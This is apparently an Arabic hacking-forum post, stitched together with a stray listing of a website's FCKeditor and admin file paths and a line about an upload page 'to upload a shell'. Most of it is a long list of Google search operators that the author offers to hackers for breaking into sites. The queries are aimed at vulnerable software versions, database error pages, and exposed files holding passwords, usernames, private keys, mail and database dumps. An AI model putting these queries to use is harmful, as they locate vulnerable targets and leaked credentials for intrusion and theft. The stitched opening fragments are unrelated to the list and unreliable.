./administracion/FCKeditor/editor/filemanager/upload/php/util.php ./administracion/FCKeditor/editor/filemanager/upload/php/upload.php ./administracion/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html ./administracion/FCKeditor/editor/filemanager/browser/default/frmcreatefolder.html ./administracion/FCKeditor/editor/filemanager/browser/default/frmupload.html ./administracion/FCKeditor/editor/filemanager/browser/default/connectors/test.html ./administracion/FCKeditor/editor/filemanager/browser/default/connectors/php/util.php ./administracion/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php ./administracion/FCKeditor/editor/filemanager/browser/default/connectors/php/io.php ./administracion/FCKeditor/editor/filemanager/browser/default/connectors/php/basexml.php ./administracion/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php ./administracion/FCKeditor/editor/filemanager/browser/default/frmfolders.html ./administracion/FCKeditor/editor/filemanager/browser/default/frmresourcetype.html ./administracion/FCKeditor/editor/filemanager/browser/default/frmactualfolder.html ./administracion/FCKeditor/editor/filemanager/browser/default/browser.html ./administracion/FCKeditor/editor/fckdialog.html ./administracion/FCKeditor/editor/fckeditor.html ./administracion/FCKeditor/editor/plugins/placeholder/fck_placeholder.html ./administracion/FCKeditor/editor/fckblank.html ./administracion/FCKeditor/editor/skins/_fckviewstrips.html ./administracion/FCKeditor/editor/dialog/fck_table.html ./administracion/FCKeditor/editor/dialog/fck_find.html ./administracion/FCKeditor/editor/dialog/fck_listprop.html ./administracion/FCKeditor/editor/dialog/fck_hiddenfield.html ./administracion/FCKeditor/editor/dialog/fck_smiley.html ./administracion/FCKeditor/editor/dialog/fck_universalkey.html ./administracion/FCKeditor/editor/dialog/fck_textarea.html ./administracion/FCKeditor/editor/dialog/fck_spellerpages.html ./administracion/FCKeditor/editor/dialog/fck_docprops/fck_document_preview.html ./administracion/FCKeditor/editor/dialog/fck_specialchar.html ./administracion/FCKeditor/editor/dialog/fck_spellerpages/spellerpages/blank.html ./administracion/FCKeditor/editor/dialog/fck_spellerpages/spellerpages/spellchecker.html ./administracion/FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php ./administracion/FCKeditor/editor/dialog/fck_spellerpages/spellerpages/controls.html ./administracion/FCKeditor/editor/dialog/fck_image.html ./administracion/FCKeditor/editor/dialog/fck_anchor.html ./administracion/FCKeditor/editor/dialog/fck_button.html ./administracion/FCKeditor/editor/dialog/fck_colorselector.html ./administracion/FCKeditor/editor/dialog/fck_replace.html ./administracion/FCKeditor/editor/dialog/fck_link.html ./administracion/FCKeditor/editor/dialog/fck_source.html ./administracion/FCKeditor/editor/dialog/fck_radiobutton.html ./administracion/FCKeditor/editor/dialog/fck_paste.html ./administracion/FCKeditor/editor/dialog/fck_image/fck_image_preview.html ./administracion/FCKeditor/editor/dialog/fck_flash.html ./administracion/FCKeditor/editor/dialog/fck_form.html ./administracion/FCKeditor/editor/dialog/fck_template.html ./administracion/FCKeditor/editor/dialog/fck_select.html ./administracion/FCKeditor/editor/dialog/fck_checkbox.html ./administracion/FCKeditor/editor/dialog/fck_tablecell.html ./administracion/FCKeditor/editor/dialog/fck_textfield.html ./administracion/FCKeditor/editor/dialog/fck_docprops.html ./administracion/FCKeditor/editor/dialog/fck_about/lgpl.html ./administracion/FCKeditor/editor/dialog/fck_flash/fck_flash_preview.html ./administracion/FCKeditor/editor/dialog/fck_about.html ./administracion/FCKeditor/_documentation.html ./administracion/FCKeditor/_testcases/004.html ./administracion/FCKeditor/_testcases/008.html ./administracion/FCKeditor/_testcases/002.html ./administracion/FCKeditor/_testcases/007.html ./administracion/FCKeditor/_testcases/009.html ./administracion/FCKeditor/_testcases/005.html ./administracion/FCKeditor/_testcases/003.html ./administracion/FCKeditor/_testcases/001.html ./administracion/FCKeditor/_testcases/010.html ./administracion/FCKeditor/_testcases/006.html ./administracion/enviar_telfprov.php ./administracion/sample01.php ./administracion/enviar_noticia.php ./administracion/noticia_enviada.php ./administracion/receta_enviada.php ./administracion/enlace_enviado.php ./administracion/termino_enviado.php ./fabricacion.php ./ver_receta.php ./boutiques.php ./tipos.php ./recetas.php ./image/0183006.php ./image/00183006.php ./image/123456.php ./image/index.html ./image/183006.php ./contacto.php ./generador.php ./tiendas_online.php ./combinaciones.php 13 liens référencés dans les fichiers. Génération du fichier sitemap.xml... ============================================================================ .com/upload/index.html لرفع شل ================================= موسوعة كبيرة من كلمات البحث المهمة للهكرز في محرك بحث جوجل google مهمة جدا بسم الله الرحمن الرحيم كلمات بحث مهمة جدا للهكرز في اختراق المواقع والبحث عن الملفات والثغرات بشكل افضل بواسطة هذه الكلمات البحث وهي متنوعة مصنفة ما اطول عليكم الكلمات هي : Advisories And Vulnerabilities ______________________________ "1999-2004 FuseTalk Inc" -site:fusetalk.com "2003 DUware All Rights Reserved" "2004-2005 ReloadCMS Team." "2005 SugarCRM Inc. All Rights Reserved" "Powered By SugarCRM" "Active Webcam Page" inurl:8080 "Based on DoceboLMS 2.0" "BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen" "BosDates Calendar System " "powered by BosDates v3.2 by BosDev" "Calendar programming by AppIdeas.com" filetypehp "Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved" "Mambo is Free Software released" "Copyright 2004 © Digital Scribe v.1.4" "Copyright © 2002 Agustin Dondo ******s" "CosmoShop by Zaunz Publishing" inurl:"cgi-bin/cosmoshop/lshop.cgi" -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11* "Cyphor (Release:" -www.cynox.ch "delete entries" inurl:admin/delete.asp "driven by: ASP Message Board" "Enter ip" inurl:"php-ping.php" "IceWarp Web Mail 5.3.0" "Powered by IceWarp" "Ideal BB Version: 0.1" -idealbb.com "index of" intext:fckeditor inurl:fckeditor "inurl:/site/articles.asp?idcategory=" "Maintained with Subscribe Me 2.044.09p"+"Professional" inurl:"s.pl" "Mimicboard2 086"+"2000 Nobutaka Makino"+"password"+"message" inurlage=1 "News generated by Utopia News Pro" | "Powered By: Utopia News Pro" "Obtenez votre forum Aztek" -site:forum-aztek.com "Online Store - Powered by ProductCart" "PhpCollab . Log In" | "NetOffice . Log In" | (intitle:"index.of." intitlehpcollab|netoffice inurlhpcollab|netoffice -gentoo) "portailphp v1.3" inurl:"index.php?affiche" inurl:"PortailPHP" -site:safari-msi.com "Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3") "powered by 4images" "Powered by A-CART" "powered by active php bookmarks" | inurl:bookmarks/view_group.php?id= "Powered by AJ-Fork v.167" "Powered by and copyright class-1" 0.24.4 "powered by antiboard" "Powered by autolinks pro 2.1" inurl:register.php "Powered by AzDg" (2.1.3 | 2.1.2 | 2.1.1) "powered by claroline" -demo "Powered by Coppermine Photo Gallery" "Powered by Coppermine Photo Gallery" ( "v1.2.2 b" | "v1.2.1" | "v1.2" | "v1.1" | "v1.0") "powered by CubeCart 2.0" "Powered by CubeCart" "Powered by CuteNews" "Powered by DCP-Portal v5.5" "Powered by DMXReady Site Chassis Manager" -site:dmxready.com "Powered by FUDForum 2.6" -site:fudforum.org -johnny.ihackstuff "Powered by FUDForum 2.7" -site:fudforum.org -johnny.ihackstuff "Powered by FUDforum" "powered by Gallery v" "[slideshow]"|"images" inurl:gallery "Powered by Gallery v1.4.4" "Powered by GTChat 0.95"+"User Login"+"Remember my login information" "powered by guestbook ******" -ihackstuff -exploit "powered by GuppY v4"|"Site créé avec GuppY v4" "Powered by IceWarp Software" inurl:mail "Powered by Ikonboard 3.1.1" "powered by ITWorking" "Powered by Loudblog" "Powered by MD-Pro" | "made with MD-Pro" "Powered by Megabook *" inurl:guestbook.cgi "Powered by MercuryBoard [v1" "powered by minibb" -site:Free Forum Software Script, MySQL PHP Bulletin Board - miniBB -intext:1.7f "Powered by My Blog" intext:"FuzzyMonkey.org" "Powered by ocPortal" -demo -ocportal.com "Powered by PHP Advanced Transfer Manager" "powered by php icalendar" -ihackstuff -exploit "powered by php photo album" | inurl:"main.php?cmd=album" -demo2 -pitanje "powered by PhpBB 2.0.15" -sitehpbb.com "Powered By phpCOIN 1.2.2" "powered by phplist" | inurl:"lists/?p=subscribe" | inurl:"lists/index.php?p=subscribe" -ubbi -bugs +phplist -tincan.co.uk "Powered by PowerPortal v1.3" "powered by runcms" -runcms.com -runcms.org "powered by sblog" +"version 0.7" "Powered by Simplog" "powered by sphider" -exploit -ihackstuff -www.cs.ioc.ee "Powered by UPB" (b 1.0)|(1.0 final)|(Public Beta 1.0b) "Powered by Woltlab Burning Board" -"2.3.3" -"v2.3.3" -"v2.3.2" -"2.3.2" "Powered by WordPress" -html filetypehp -demo -wordpress.org -bugtraq "Powered by WowBB" -site:wowbb.com "Powered by Xaraya" "Copyright 2005" "Powered by XHP CMS" -ihackstuff -exploit -xhp.targetit.ro "Powered by XOOPS 2.2.3 Final" "Powered by YaPig V0.92b" "Powered by yappa-ng" "Powered by Zorum 3.5" "Powered by: Land Down Under 800" | "Powered by: Land Down Under 801" - www.neocrome.net "Powered By: lucidCMS 1.0.11" "running: Nucleus v3.1" -.nucleuscms.org -demo "Site powered By Limbo CMS" "Software PBLang" 4.65 filetypehp "SquirrelMail version 1.4.4" inurl:src exthp "Thank You for using WPCeasy" "This page has been automatically generated by Plesk Server Administrator" "This ****** was created by Php-ZeroNet" "****** . Php-ZeroNet" "This website engine code is copyright" "2005 by Clever Copy" -inurl:demo "This website powered by PHPX" -demo "This website was created with phpWebThings 1.4" "Welcome to the versatileBulletinBoard" | "Powered by versatileBulletinBoard" "You have not provided a survey identification number" ERROR -xoops.org "please contact" ("powered by nocc" intitle:"NOCC Webmail") -site:sourceforge.net -Zoekinalles.nl -analysis ("Skin Design by Amie of Intense")|("Fanfiction Categories" "Featured Stories")|("default2, 3column, Romance, eFiction") ("This Dragonfly™ installation was" | "Thanks for downloading Dragonfly") -inurl:demo -inurl:cpgnuke.com (intitle:"Flyspray setup"|"powered by flyspray 0.9.7") -flyspray.rocks.cc (intitle:"metaframe XP Login")|(intitle:"metaframe Presentation server Login") +"Powered by Invision Power Board v2.0.0..2" +"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl +intext:"powered by MyBulletinBoard" Achievo webbased project management allintitle:aspjar.com guestbook E-market remote code execution EarlyImpact Productcart exthp intext:"Powered by phpNewMan Version" extl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input filetype:cgi inurl:nbmember.cgi filetype:cgi inurldesk.cgi filetype:cgi inurl:tseekdir.cgi filetypehp intitle:"paNews v2.0b4" filetypehp inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat) intext:"2000-2001 The phpHeaven Team" -sourceforge intext:"2000-2001 The phpHeaven Team" -sourceforge intext:"Calendar Program © Copyright 1999 Matt Kruse" "Add an event" intext:"LinPHA Version" intext:"Have fun" intext:"PhpGedView Version" intext:"final - index" -inurl:demo intext:"Powered by CubeCart 3.0.6" intitle:"Powered by CubeCart" intext:"Powered by DEV web management system" -dev-wms.sourceforge.net -demo intext:"Powered by flatnuke-2.5.3" +"Get RSS News" -demo intext:"powered by gcards" -ihackstuff -exploit intext:"Powered By Geeklog" -geeklog.net intext:"Powered by phpBB 2.0.13" inurl:"cal_view_month.php"|inurl:"downloads.php" intext:"Powered by Plogger!" -plogger.org -ihackstuff -exploit intext:"Powered by SimpleBBS v1.1"* intext:"Powered By: Snitz Forums 2000 Version 3.4.00..03" intext"UBB.threads™ 6.2"|"UBB.threads™ 6.3") intext:"You * not logged *" -site:ubbcentral.com intitle:"4images - Image Gallery Management System" and intext:"Powered by 4images 1.7.1" intitle:"b2evo installer" intext:"Installer für Version" intitle:"blog torrent upload" intitle:"EMUMAIL - Login" "Powered by EMU Webmail" intitle:"HelpDesk" "If you need additional help, please email helpdesk at" intitle:"igenus webmail login" intitle:"Looking Glass v20040427" "When verifying an URL check one of those" intitle:"MRTG/RRD" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi) intitle:"myBloggie 2.1.1..2 - by myWebland" intitle:"osTicket :: Support Ticket System" intitle:"PHP TopSites FREE Remote Admin" intitle:"phpDocumentor web interface" intitle:"PowerDownload" ("PowerDownload v3.0.2 ©" | "PowerDownload v3.0.3 ©" ) -siteower******s.org intitle:"View Img" inurl:viewimg.php intitle:"WebJeff - FileManager" intext:"login" intext:Pass|PAsse intitle:"WordPress > * > Login form" inurl:"wp-login.php" intitle:admbook intitle:version filetypehp intitle:guestbook "advanced guestbook 2.2 powered" intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook" intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook" intitle:Mantis "Welcome to the bugtracker" "0.15 | 0.16 | 0.17 | 0.18" intitle:PHPOpenChat inurl:"index.php?language=" intitle:welcome.to.horde inurl:"/cgi-bin/loadpage.cgi?user_id=" inurl:"/login.asp?folder=" "Powered by: i-Gallery 3.3" inurl:"/site/articles.asp?idcategory=" inurl:"comment.php?serendipity" inurl:"extras/update.php" intext:mysql.php -display inurl:"forumdisplay.php" +"Powered by: vBulletin Version 3.0.0..4" inurl:"messageboard/Forum.asp?" inurl:"slxweb.dll" inurl:"wfdownloads/viewcat.php?list=" inurl:*.exe ext:exe inurl:/*cgi*/ inurl:/SiteChassisManager/ inurl:cal_make.pl inurl:chitchat.php "choose graphic" inurl:citrix/metaframexp/default/login.asp? ClientDetection=On inurl:comersus_message.asp inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php inurl:database.php | inurl:info_db.php exthp "Database V2.*" "Burning Board *" inurl:directorypro.cgi inurl:docmgr | intitle:"DocMGR" "enter your Username and"|"und Passwort bitte"|"saisir votre nom"|"su nombre de usuario" -extdf -inurl:"download.php inurl:gotoURL.asp?url= inurl:index.php fees shop link.codes merchantAccount inurl:install.pl intitle:GTchat inurlerldiver.cgi ext:cgi inurl:resetcore.php exthp inurl:server.php exthp intext:"No SQL" -Released inurl:sphpblog intext:"Powered by Simple PHP Blog 0.4.0" inurl:sysinfo.cgi ext:cgi inurl:technote inurl:main.cgi*filename=* inurl:tmssql.php exthp mssql pear adodb -cvs -akbk inurl:ttt-webmaster.php inurl:wiki/MediaWiki Invision Power Board SSI.PHP SQL Injection mnGoSearch vulnerability phpLDAPadmin intitlehpLDAPadmin filetypehp inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7) Powered by PHP-Fusion v6.00.109 © 2003-2005. -php-fusion.co.uk powered.by.instaBoard.version.1.3 Powered.by:.vBulletin.Version ...3.0.6 Quicksite demopages for Typo3 ReMOSitory module for Mambo uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album vBulletin version 3.0.1 newreply.php XSS VP-ASP Shopping Cart XSS WEBalbum 2004-2006 duda -ihackstuff -exploit WebAPP directory traversal Error Messages ______________ "A syntax error has occurred" filetype:ihtml "access denied for user" "using password" "An illegal character has been found in the statement" -"previous message" "ASP.NET_SessionId" "data source=" "Can't connect to local" intitle:warning "Chatologica MetaSearch" "stack tracking" "detected an internal error [IBM][CLI Driver][DB2/6000]" "error found handling the request" cocoon filetype:xml "Fatal error: Call to undefined function" -reply -the -next "Incorrect syntax near" "Incorrect syntax near" "Internal Server Error" "server at" "Invision Power Board Database Error" "ORA-00933: SQL command not properly ended" "ORA-12541: TNS:no listener" intitle:"error occurred" "Parse error: parse error, unexpected T_VARIABLE" "on line" filetypehp "PostgreSQL query failed: ERROR: parser: parse error" "Supplied argument is not a valid MySQL result resource" "Syntax error in query expression " -the "The ****** whose uid is " "is not allowed to access" "There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser." "Unable to jump to row" "on MySQL result index" "on line" "Unclosed quotation mark before the character string" "Warning: Bad arguments to (join|implode) () in" "on line" -help -forum "Warning: Cannot modify header information - headers already sent" "Warning: Division by zero in" "on line" -forum "Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum "Warning: mysql_query()" "invalid query" "Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL" "Warning: Supplied argument is not a valid File-Handle resource in" "Warning:" "failed to open stream: HTTP request failed" "on line" "Warning:" "SAFE MODE Restriction in effect." "The ****** whose uid is" "is not allowed to access owned by uid 0 in" "on line" "SQL Server Driver][SQL Server]Line 1: Incorrect syntax near" An unexpected token "END-OF-STATEMENT" was found Coldfusion Error Pages filetype:asp + "[ODBC SQL" filetype:asp "Custom Error Message" Category Source filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error" filetypehp inurl:"logging.php" "Discuz" error IIS 4.0 error messages IIS web server error messages Internal Server Error intext:"Error Message : Error loading required libraries." intext:"Warning: Failed opening" "on line" "include_path" intitle:"Apache Tomcat" "Error Report" intitle:"Default PLESK Page" intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm intitle:"Error Occurred" "The error occurred in" filetype:cfm intitle:"Error using Hypernews" "Server Software" intitle:"Execution of this ****** not permitted" intitle:"Under construction" "does not currently have" intitle:Configuration.File inurl:softcart.exe MYSQL error message: supplied argument.... mysql error with query Netscape Application Server Error page ORA-00921: unexpected end of SQL command ORA-00921: unexpected end of SQL command ORA-00936: missing expression PHP application warnings failing "include_path" sitebuildercontent sitebuilderfiles sitebuilderpictures Snitz! forums db path error SQL syntax error Supplied argument is not a valid PostgreSQL result warning "error on line" php sablotron Windows 2000 web server error messages Files Containing Important Information ______________________________________ intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu "#mysql dump" filetype:sql "#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3 "allow_call_time_pass_reference" "PATH_INFO" "Certificate Practice Statement" inurlPDF | DOC) "Generated by phpSystem" "generated by wwwstat" "Host Vulnerability Summary Report" "HTTP_FROM=googlebot" googlebot.com "Server_Software=" "Index of" / "chat/logs" "Installed Objects Scanner" inurl:default.asp "MacHTTP" filetype:log inurl:machttp.log "Mecury Version" "Infastructure Group" "Microsoft ® Windows * ™ Version * DrWtsn32 Copyright ©" ext:log "Most Submitted Forms and ******s" "this section" "Network Vulnerability Assessment Report" "not for distribution" confidential "not for public release" -.edu -.gov -.mil "phone * * *" "address *" "e-mail" intitle:"curriculum vitae" "phpMyAdmin" "running on" inurl:"main.php" "produced by getstats" "Request Details" "Control Tree" "Server Variables" "robots.txt" "Disallow:" filetype:txt "Running in Child mode" "sets mode: +p" "sets mode: +s" "Thank you for your order" +receipt "This is a Shareaza Node" "This report was generated by WebLog" ( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intextassword|subject (intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results") (intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob (inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt +":8080" +":3128" +":80" filetype:txt +"HSTSNR" -"netop.com" -sitehp.net -"The PHP Group" inurl:source inurl:url extHp 94FBR "ADOBE PHOTOSHOP" AIM buddy lists allinurl:/examples/jsp/snp/snoop.jsp allinurl:cdkey.txt allinurl:servlet/SnoopServlet cgiirc.conf cgiirc.conf contacts ext:wml data filetype:mdb -site:gov -site:mil exported email addresses extdoc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential ext:asp inurlathto.asp ext:ccm ccm -catacomb ext:CDX CDX ext:cgi inurl:editcgi.cgi inurl:file= ext:conf inurl:rsyncd.conf -cvs -man ext:conf NoCatAuth -cvs ext:dat bpk.dat extBF DBF extCA DCA ext:gho gho ext:ics ics ext:ini intext:env.ini ext:jbf jbf ext:ldif ldif ext:log "Software: Microsoft Internet Information Services *.*" ext:mdb inurl:*.mdb inurl:fpdb shop.mdb ext:nsf nsf -gov -mil extlist filetypelist inurl:bookmarks.plist extqi pqi -database ext:reg "username=*" putty ext:txt "Final encryption key" ext:txt inurl:dxdiag ext:vmdk vmdk ext:vmx vmx filetype:asp DBQ=" * Server.MapPath("*.mdb") filetype:bkf bkf filetype:blt "buddylist" filetype:blt blt +intext:screenname filetype:cfg auto_inst.cfg filetype:cnf inurl:_vti_pvt access.cnf filetype:conf inurl:firewall -intitle:cvs filetype:config web.config -CVS filetype:ctt Contact filetype:ctt ctt messenger filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To" filetype:fp3 fp3 filetype:fp5 fp5 -site:gov -site:mil -"cvs log" filetype:fp7 fp7 filetype:inf inurl:capolicy.inf filetype:lic lic intext:key filetype:log access.log -CVS filetype:log cron.log filetype:mbx mbx intext:Subject filetype:myd myd -CVS filetype:ns1 ns1 filetypera ora filetypera tnsnames filetypedb pdb backup (Pilot | Pluckerdb) filetypehp inurl:index inurlhpicalendar -site:sourceforge.net filetypeot inurl:john.pot filetype:PS ps filetypest inurl:"outlook.pst" filetypest pst -from -to -date filetype:qbb qbb filetype:QBW qbw filetype:rdp rdp filetype:reg "Terminal Server Client" filetype:vcs vcs filetype:wab wab filetype:xls -site:gov inurl:contact filetype:xls inurl:"email.xls" Financial spreadsheets: finance.xls Financial spreadsheets: finances.xls Ganglia Cluster Reports haccess.ctl (one way) haccess.ctl (VERY reliable) ICQ chat logs, please... intext:"Session Start * * * *:*:* *" filetype:log intext:"Tobias Oetiker" "traffic analysis" intextpassword | passcode) intextusername | userid | user) filetype:csv intext:gmail invite intext:http://gmail.google.com/gmail/a intext:SQLiteManager inurl:main.php intext:ViewCVS inurl:Settings.php intitle:"admin panel" +"Powered by RedKernel" intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html) intitle:"AppServ Open Project" -site:www.appservnetwork.com intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos" intitle:"Big Sister" +"OK Attention Trouble" intitle:"curriculum vitae" filetype:doc intitle:"edna:streaming mp3 server" -forums intitle:"FTP root at" intitle:"index of" +myd size intitle:"Index Of" -inurl:maillog maillog size intitle:"Index Of" ******s.txt size intitle:"index of" mysql.conf OR mysql_config intitle:"Index of" upload size parent directory intitle:"index.of *" admin news.asp configview.asp intitle:"index.of" .diz .nfo last modified intitle:"Joomla - Web Installer" intitle:"LOGREP - Log file reporting system" -site:itefix.no intitle:"Multimon UPS status page" intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php ) intitle:"PhpMyExplorer" inurl:"index.php" -cvs intitle:"statistics of" "advanced web statistics" intitle:"System Statistics" +"System and Network Information Center" intitle:"urchin (5|3|admin)" ext:cgi intitle:"Usage Statistics for" "Generated by Webalizer" intitle:"wbem" compaq login "Compaq Information Technologies Group" intitle:"Web Server Statistics for ****" intitle:"web server status" SSH Telnet intitle:"Welcome to F-Secure Policy Manager Server Welcome Page" intitle:"welcome.to.squeezebox" intitle:admin intitle:login intitle:Bookmarks inurl:bookmarks.html "Bookmarks intitle:index.of "Apache" "server at" intitle:index.of cleanup.log intitle:index.of dead.letter intitle:index.of inbox intitle:index.of inbox dbx intitle:index.of ws_ftp.ini intitle:intranet inurl:intranet +intext:"phone" inurl:"/axs/ax-admin.pl" -****** inurl:"/cricket/grapher.cgi" inurl:"bookmark.htm" inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM inurl:"newsletter/admin/" inurl:"newsletter/admin/" intitle:"newsletter admin" inurl:"putty.reg" inurl:"smb.conf" intext:"workgroup" filetype:conf conf inurl:*db filetype:mdb inurl:/cgi-bin/pass.txt inurl:/_layouts/settings inurl:admin filetype:xls inurl:admin intitle:login inurl:backup filetype:mdb inurl:build.err inurl:cgi-bin/printenv inurl:cgi-bin/testcgi.exe "Please distribute TestCGI" inurl:changepassword.asp inurl:ds.py inurl:email filetype:mdb inurl:fcgi-bin/echo inurl:forum filetype:mdb inurl:forward filetype:forward -cvs inurl:getmsg.html intitle:hotmail inurl:log.nsf -gov inurl:main.php phpMyAdmin inurl:main.php Welcome to phpMyAdmin inurl:netscape.hst inurl:netscape.hst inurl:netscape.ini inurldbc.ini ext:ini -cvs inurlerl/printenv inurlhp.ini filetype:ini inurlreferences.ini "[emule]" inurlrofiles filetype:mdb inurl:report "EVEREST Home Edition " inurl:server-info "Apache Server Information" inurl:server-status "apache" inurl:snitz_forums_2000.mdb inurl:ssl.conf filetype:conf inurl:tdbin inurl:vbstats.php "page generated" inurl:wp-mail.php + "There doesn't seem to be any new mail." inurl:XcCDONTS.asp ipsec.conf ipsec.secrets ipsec.secrets Lotus Domino address books mail filetype:csv -site:gov intext:name Microsoft Money Data Files mt-db-pass.cgi files MySQL tabledata dumps mystuff.xml - Trillian data files OWA Public Folders (direct view) Peoples MSN contact lists php-addressbook "This is the addressbook for *" -warning phpinfo() phpMyAdmin dumps phpMyAdmin dumps private key files (.csr) private key files (.key) Quicken data files rdbqds -site:.edu -site:.mil -site:.gov robots.txt site:edu admin grades site:Mailinator - Let Them Eat Spam! inurl:ShowMail.do SQL data dumps Squid cache server reports Unreal IRCd WebLog Referrers Welcome to ntop! Files Containing Passwords __________________________ "admin account info" filetype:log !Host=*.* intext:enc_UserPassword=* extcf "# -FrontPage-" extwd inurlservice | authors | administrators | users) "# -FrontPage-" inurl:service.pwd "AutoCreate=TRUE password=*" "http://*:*@www" domainname "index of/" "ws_ftp.ini" "parent directory" "liveice configuration file" ext:cfg -site:sourceforge.net "parent directory" +proftpdpasswd "powered by ducalendar" -site:duware.com "Powered by Duclassified" -site:duware.com "Powered by Duclassified" -site:duware.com "DUware All Rights reserved" "powered by duclassmate" -site:duware.com "Powered by Dudirectory" -site:duware.com "powered by dudownload" -site:duware.com "Powered By Elite Forum Version *.*" "Powered by Link Department" "sets mode: +k" "your password is" filetype:log "Powered by DUpaypal" -site:duware.com allinurl: admin mdb auth_user_file.txt config.php eggdrop filetype:user user enable password | secret "current configuration" -intext:the etc (index.of) ext:asa | ext:bak intext:uid intextwd -"uid..pwd" database | server | dsn ext:inc "pwd=" "UID=" ext:ini eudora.ini ext:ini Version=4.0.0.4 password extasswd -intext:the -sample -example ext:txt inurl:unattend.txt ext:yml database inurl:config filetype:bak createobject sa filetype:bak inurl:"htaccess|passwd|shadow|htusers" filetype:cfg mrtg "target[*]" -sample -cvs -example filetype:cfm "cfapplication name" password filetype:conf oekakibbs filetype:conf slapd.conf filetype:config config intext:appSettings "User ID" filetype:dat "password.dat" filetype:dat inurl:Sites.dat filetype:dat wand.dat filetype:inc dbconn filetype:inc intext:mysql_connect filetype:inc mysql_connect OR mysql_pconnect filetype:inf sysprep filetype:ini inurl:"serv-u.ini" filetype:ini inurl:flashFXP.ini filetype:ini ServUDaemon filetype:ini wcx_ftp filetype:ini ws_ftp pwd filetype:ldb admin filetype:log "See `ipsec --copyright" filetype:log inurl:"password.log" filetype:mdb inurl:users.mdb filetype:mdb wwforum filetype:netrc password filetypeass pass intext:userid filetypeem intextrivate filetyperoperties inurl:db intextassword filetypewd service filetypewl pwl filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword" filetype:reg reg +intext:”WINVNC3” filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS filetype:sql "insert into" (pass|passwd|password) filetype:sql ("values * MD5" | "values * password" | "values * encrypt") filetype:sql ("passwd values" | "password values" | "pass values" ) filetype:sql +"IDENTIFIED BY" -cvs filetype:sql password filetype:url +inurl:"ftp://" +inurl:";@" filetype:xls username password email htpasswd htpasswd / htgroup htpasswd / htpasswd.bak intext:"enable password 7" intext:"enable secret 5 $" intext:"powered by EZGuestbook" intext:"powered by Web Wiz Journal" intitle:"index of" intext:connect.inc intitle:"index of" intext:globals.inc intitle:"Index of" passwords modified intitle:"Index of" sc_serv.conf sc_serv content intitle:"phpinfo()" +"mysql.default_password" +"Zend ******ing Language Engine" intitle:dupics inurladd.asp | default.asp | view.asp | voting.asp) -site:duware.com intitle:index.of administrators.pwd intitle:Index.of etc shadow intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak" intitle:rapidshare intext:login inurl:"calendar******/users.txt" inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set" inurl:"GRC.DAT" intext:"password" inurl:"Sites.dat"+"PASS=" inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample inurl:"wvdial.conf" intext:"password" inurl:/db/main.mdb inurl:/wwwboard inurl:/yabb/Members/Admin.dat inurl:ccbill filetype:log inurl:cgi-bin inurl:calendar.cfg inurl:chap-secrets -cvs inurl:config.php dbuname dbpass inurl:filezilla.xml -cvs inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man inurl:nuke filetype:sql inurlspfd.conf intextassword -sample -test -tutorial -download inurlap-secrets -cvs inurlass.dat inurlerform filetype:ini inurlerform.ini filetype:ini inurl:secring ext:skr | extgp | ext:bak inurl:server.cfg rcon password inurl:ventrilo_srv.ini adminpassword inurl:vtund.conf intextass -cvs inurl:zebra.conf intextassword -sample -test -tutorial -download LeapFTP intitle:"index.of./" sites.ini modified master.passwd mysql history files NickServ registration passwords passlist passlist.txt (a better way) passwd passwd / etc (reliable) people.lst psyBNC config files pwd.db server-dbs "intitle:index of" signin filetype:url spwd.db / passwd trillian.ini wwwboard WebAdmin inurlasswd.txt wwwboard|webadmin [WFClient] Password= filetype:ica Files Containing Usernames __________________________ "index of" / lck +intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for" bash_history files filetype:conf inurlroftpd.conf -sample filetype:log username putty filetype:reg reg +intext:"internet account manager" filetype:reg reg HKEY_CURRENT_USER username index.of perform.ini intext:"SteamUserPassphrase=" 